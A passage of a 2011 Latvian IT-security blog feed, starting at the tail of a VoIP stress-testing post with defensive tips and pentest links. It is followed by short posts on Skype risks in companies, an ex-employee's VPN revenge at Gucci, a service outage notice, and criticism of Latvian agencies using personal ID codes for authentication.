<p>Viss pārējais ir izdomas un skriptu jautājums.</p>
<p>Nelieli raksti par VoIP no <a href="http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP#Svwar">Back-track</a>, <a href="http://sysadminman.net/blog/2009/hacking-and-securing-your-asterisk-server-592">sysadmin.net</a>, <a href="http://code.google.com/p/sipvicious/wiki/Svwarusage" target="_blank">te</a>, <a href="http://www.rizvisarwar.info/study-resources-1/kth-study/principle-of-computer-security" target="_blank">asterix hacking and security</a>, <a href="http://nagg.ru/2011/03/vzlom-i-zashhita-vashego-servera-asterisk/" target="_blank">asterix krieviski</a> .<br />
<a href="http://www.voipsa.org/Resources/tools.php">Programmu uzskaitījums</a><br />
<a href="http://en.wikipedia.org/wiki/Session_Initiation_Protocol">Nedaudz par pašu SIP protokolu</a></p>
<p>!!!Atcerieties &#8211; Bez resursa turētāja atļaujas ir aizliekts veikt jebkādus testus!!!<br />
Anonimitāte internetā ir mīts. Viss pārējais ir laika jautājums.</p>
<p>Kā aizsargāties?<br />
Vienmēr izmantot sarežģītas paroles- vienkāršas paroles ar svcrack tiek uzlauztas dažu sekunžu laikā;<br />
Ieslēgt alwaysauthreject, lai nevar atklāt VOIP numurus un līdz ar to piemeklēt paroli;<br />
Ja iespējams limitēt pieeju PBX;<br />
Izmantot vairāku līmeņu arhitektūru;<br />
Aizliegt pārējo portu izmantošanu;<br />
Ieviest pret DOS un DDOS aizsardzību, jo kā izrādījās ar autentifikācijas pieprasījumiem var vienkārši uzkarināt PBX;<br />
Un prasīt google secure VoIP un hack VoIP.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/administratoru-tests' rel='bookmark' title='Administratoru tests'>Administratoru tests</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/voip-stress-tests/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nelielas pārdomas par skype</title>
		<link>http://dll.lv/nelielas-pardomas-par-skype?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=nelielas-pardomas-par-skype</link>
		<comments>http://dll.lv/nelielas-pardomas-par-skype#comments</comments>
		<pubDate>Mon, 18 Apr 2011 07:41:38 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[skype]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1589</guid>
		<description><![CDATA[Tas, ka skype sniedz daudzas priekšrocības komunikācijā nav apšaubāms, tomēr ir jāapzinās arī iespējamie draudi, kuri var rasties šo lietojumu izmantojot uzņēmumā. Raksts par to ir pieejams šeit un nedaudz vecāks materiāls šeit. Ja tomēr ir pieņemts lēmums par skype &#8230; <a href="http://dll.lv/nelielas-pardomas-par-skype">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/pardomas-par-arzemju-hosingu' rel='bookmark' title='Pārdomas par ārzemju hostingu'>Pārdomas par ārzemju hostingu</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur' rel='bookmark' title='Mēģinām pielietot EDS konstatēto ievainojamību citur'>Mēģinām pielietot EDS konstatēto ievainojamību citur</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Tas, ka skype sniedz daudzas priekšrocības komunikācijā nav apšaubāms, tomēr ir jāapzinās arī iespējamie draudi, kuri var rasties šo lietojumu izmantojot uzņēmumā. Raksts par to ir pieejams <a href="http://www.itsecurityjournal.com/index.php/Latest/Skype-in-the-Enterprise-%97-Opening-Pandoras-Box.html">šeit</a> un nedaudz vecāks materiāls <a href="http://www.sans.org/reading_room/whitepapers/voip/skype-practical-security-analysis_32918">šeit</a>. </p>
<p>Ja tomēr ir pieņemts lēmums par skype lietošanu, tad manuprāt vismaz ir jāaizliedz failu pārsūtīšana un API lietošana, tādā veidā samazinot visādas drazas izplatīšanās iespējamību. Vēl daži <a href="http://www.bgsu.edu/infosec/page69239.html">ieteikumi</a>.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/pardomas-par-arzemju-hosingu' rel='bookmark' title='Pārdomas par ārzemju hostingu'>Pārdomas par ārzemju hostingu</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/meginam-pielietot-eds-konstateto-ievainojamibu-citur' rel='bookmark' title='Mēģinām pielietot EDS konstatēto ievainojamību citur'>Mēģinām pielietot EDS konstatēto ievainojamību citur</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/nelielas-pardomas-par-skype/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Aizejoša darbinieka risks</title>
		<link>http://dll.lv/aizejosa-darbinieka-risks?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=aizejosa-darbinieka-risks</link>
		<comments>http://dll.lv/aizejosa-darbinieka-risks#comments</comments>
		<pubDate>Tue, 12 Apr 2011 05:05:27 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[Gucci]]></category>
		<category><![CDATA[inci]]></category>
		<category><![CDATA[VPN]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1576</guid>
		<description><![CDATA[Gucci uzņēmums uz savas ādas izbaudīja IT darbinieka atriebību, kuru viņš realizēja vēl strādājot izveidojot VPN pieslēgumu. Ar rakstu var iepzīties te. Daudzi uzņēmumi paļaujas uz darbinieku godprātu un kā var redzēt velti. Ārējo pieslēgumu kontrolē ir ļoti būtiska. Related &#8230; <a href="http://dll.lv/aizejosa-darbinieka-risks">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Gucci uzņēmums uz savas ādas izbaudīja IT darbinieka atriebību, kuru viņš realizēja vēl strādājot izveidojot VPN pieslēgumu.<br />
Ar rakstu var iepzīties <a href="http://nakedsecurity.sophos.com/2011/04/05/fired-gucci-employee-charged-with-hacking-into-network/">te</a>.<br />
Daudzi uzņēmumi paļaujas uz darbinieku godprātu un kā var redzēt velti.<br />
Ārējo pieslēgumu kontrolē ir ļoti būtiska.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/risks-iespeja-zaudet-vai-iespeja-iegut' rel='bookmark' title='Risks- iespēja zaudēt vai iespēja iegūt?'>Risks- iespēja zaudēt vai iespēja iegūt?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/aizejosa-darbinieka-risks/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Vadipats.lv tehniskais downtime</title>
		<link>http://dll.lv/vadipats-lv-tehniskais-downtime?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=vadipats-lv-tehniskais-downtime</link>
		<comments>http://dll.lv/vadipats-lv-tehniskais-downtime#comments</comments>
		<pubDate>Sun, 10 Apr 2011 18:59:10 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[downtime]]></category>
		<category><![CDATA[High availability]]></category>
		<category><![CDATA[vadipats.lv]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1572</guid>
		<description><![CDATA[Serveri mēdz nokrist un, ja risinājums nav izveidots &#8220;High availability&#8221;, tad gadās šādi. Uz e-pastu saņēmu paziņojumu: Labdien, www.vadipats.lv 2011.gada 07.aprīlī plkst.13:00 pilnvērtīgi atsāk darbību. vadipats.lv komanda atvainojas par problēmām, kas radušās sistēmas nepieejamības dēļ. Diemžēl pat visdrošākajām iekārtām mēdz &#8230; <a href="http://dll.lv/vadipats-lv-tehniskais-downtime">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/kapitals-lv-2' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Serveri mēdz nokrist un, ja risinājums nav izveidots &#8220;High availability&#8221;, tad gadās šādi.<br />
Uz e-pastu saņēmu paziņojumu:</p>
<blockquote><p>Labdien,</p>
<p>www.vadipats.lv 2011.gada 07.aprīlī plkst.13:00 pilnvērtīgi atsāk darbību. <span id="more-1572"></span></p>
<p>vadipats.lv komanda atvainojas par problēmām, kas radušās sistēmas nepieejamības dēļ.</p>
<p>Diemžēl pat visdrošākajām iekārtām mēdz būt problēmas, un šoreiz platforma Latvijas Valsts Radio un Televīzijas centra datu centrā, uz kuras darbojās vadipats.lv sistēma, nebija izņēmums, proti, 2011.gada 6.aprīlī plkst. 00:35 pārstāja funkcionēt datu centra serveris. </p>
<p>Mūsu prioritāte vienmēr ir bijusi sistēmas pieejamība un mūsu lietotāju datu drošība. Tāpēc vienmēr visiem datiem ir tikušas veidotas rezerves kopijas. Līdz ar to platformas bojājumi neietekmēja sistēmā esošos datus. </p>
<p>Diemžēl datu rezerves kopijas tiek veidotas periodiski. Tāpēc sistēma atjaunota ar datiem tādā stāvoklī, kādā tie bija uz 2011. gada 5. aprīļa plkst. 00:00.</p>
<p>Līdz ar to mums jāatvainojas tiem, kas reģistrējušies vai šī atgadījuma dēļ zaudējuši ievadītos datus periodā no 05.04.2011 plkst. 00.00 līdz 06.04.2011 plkst.00.00. Šādi dati un lietotāji sistēmā jāreģistrē atkārtoti. </p>
<p>Turpmāk vēl lielāku uzmanību pievērsīsim datu saglabāšanā un turpināsim īstenot aktīvu datu drošības nodrošināšanas politiku.</p>
<p>Paldies par sapratni.</p>
<p>Ar cieņu,<br />
vadipats.lv klientu serviss,<br />
www.vadipats.lv</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/kapitals-lv-2' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/vadipats-lv-tehniskais-downtime/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tautas skaitīšana, EDS, CSDD un ņemšanās ap perosnas kodu</title>
		<link>http://dll.lv/tautas-skaitisana-eds-csdd-un-nemsanas-ap-perosnas-kodu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tautas-skaitisana-eds-csdd-un-nemsanas-ap-perosnas-kodu</link>
		<comments>http://dll.lv/tautas-skaitisana-eds-csdd-un-nemsanas-ap-perosnas-kodu#comments</comments>
		<pubDate>Sat, 05 Mar 2011 07:33:52 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[CSDD]]></category>
		<category><![CDATA[drošs risinājums]]></category>
		<category><![CDATA[EDS]]></category>
		<category><![CDATA[personas kods]]></category>
		<category><![CDATA[Tautas skaitīšana]]></category>
		<category><![CDATA[VID]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1552</guid>
		<description><![CDATA[Līdz šim aizņemtības dēļ nebija laiks iedziļināties problēmā, ar kuru slimo visa LV jau veselu nedēļu. Principā šeit ir jāizdala divas problēmas- valsts iestāžu (un arī dažu privātu) izpratne par to, kas ir drošs autentifikācijas rīks un personas datu pieejamība &#8230; <a href="http://dll.lv/tautas-skaitisana-eds-csdd-un-nemsanas-ap-perosnas-kodu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/no-vid-eds-tiek-nopludinata-informacija' rel='bookmark' title='No VID EDS tiek nopludināta informācija'>No VID EDS tiek nopludināta informācija</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Līdz šim aizņemtības dēļ nebija laiks iedziļināties problēmā, ar kuru slimo visa LV jau veselu nedēļu.<br />
Principā šeit ir jāizdala divas problēmas- valsts iestāžu (un arī dažu privātu) izpratne par to, kas ir drošs autentifikācijas rīks un personas datu pieejamība (lietojamība).</p>
<p>1. gadījumā interesants ir viedoklis, ka privātie dokumenti ir jāsargā pašiem (lai nenoplūst pases kopijas, personas kodi, utml) un to salīdzināšana ar bankas kodu karti.</p>
<p>Diez vai viņi meklējot sev attaisnojumu padomāja no šāda skata punkta- personas apliecinošie dokumenti ir jāuzrāda, jākopē un jādod trešajām pusēm (slēdzot visādus līgumus vai iesniedzot dokumentus valsts iestādēm), turp pretim bankas kodu karti nevienam neviens neprasa.</p>
<p>Apšaubu arī otru argumentu- banku kodu kartes ir tik pat pieejamas internetā, kā personas kodi. Ja tā būtu, tad daļai cilvēku jau sen būtu iztukšoti konti. Principā smieklīgi.</p>
<p>Vispār nesaprotu cik šauri cilvēkam ir jādomā, lai izdarītu secinājumu, ka pasē pieejamie dati tiek uzskatīti par drošu autentifikācijas rīku.. .<br />
Kaut kā neticas, ka neviens auditors nepievērsa tam uzmanību (vairākās iestādēs ir savi IT auditori, drošības speciālisti, gan veiktas ārējās novērtēšanas).<br />
Šādas lietas gribot negribot liek apšaubīt šo cilvēku atbilstību ieņemamam amatam.</p>
<p>2. variantā bija vēl labāk- vienīgais, kas VID darbiniekiem ienāca prāta ir atslēgt EDS sasaisti ar pārējām sistēmām un pompozi paziņot- Tagad Jums visiem būs divreiz vairāk darba, būs jāvada gan personas kodi, gan vārdi, uzvārdi, adreses ar roku.</p>
<p>Tas viss atgādina drīzāk nedomāšanu vai klasisko domāšanu balts/melns. </p>
<p>Es piedāvātu labāk izvērtēt kāda informācija tad īsti ir jāatspoguļo tajās EDS anketās par trešajām pusēm. Manuprāt pietiktu ar personas kodu (kuru ievada pats aizpildītājs) un tad, lai no saistošām sistēmām izvada tikai vārdu un uzvārdu (lai salīdzinātu vai ievadīts pareizi). Pārējo informāciju paturot pieejamu tikai VID darbiniekiem. Tādā veidā būtu atvieglota datu ievade un nevajadzīgi nebūtu jāatspoguļo informācija.</p>
<p>Internetā pieejamie cepieni par šo tēmu- <a href="http://defense.lv/2011/03/01/tautas-skaitisana-uzkratie-konfidencialie-dati-pieejami-tresajam-personam/">Tautas skaitīšana</a>, <a href="http://defense.lv/2011/03/04/ari-csdd-elektronisko-pakalpojumu-sistema-atverta-identitates-zadzibam/">CSDD</a>, <a href="http://defense.lv/2011/03/04/no-vid-eds-vismaz-triju-gadu-garuma-notikusi-iedzivotaju-registra-datu-noplude/">EDS</a>.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/ka-tika-noladeti-dati-no-vid-eds-sistemas' rel='bookmark' title='Kā tika nolādēti dati no VID EDS sistēmas?'>Kā tika nolādēti dati no VID EDS sistēmas?</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/no-vid-eds-tiek-nopludinata-informacija' rel='bookmark' title='No VID EDS tiek nopludināta informācija'>No VID EDS tiek nopludināta informācija</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/tautas-skaitisana-eds-csdd-un-nemsanas-ap-perosnas-kodu/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

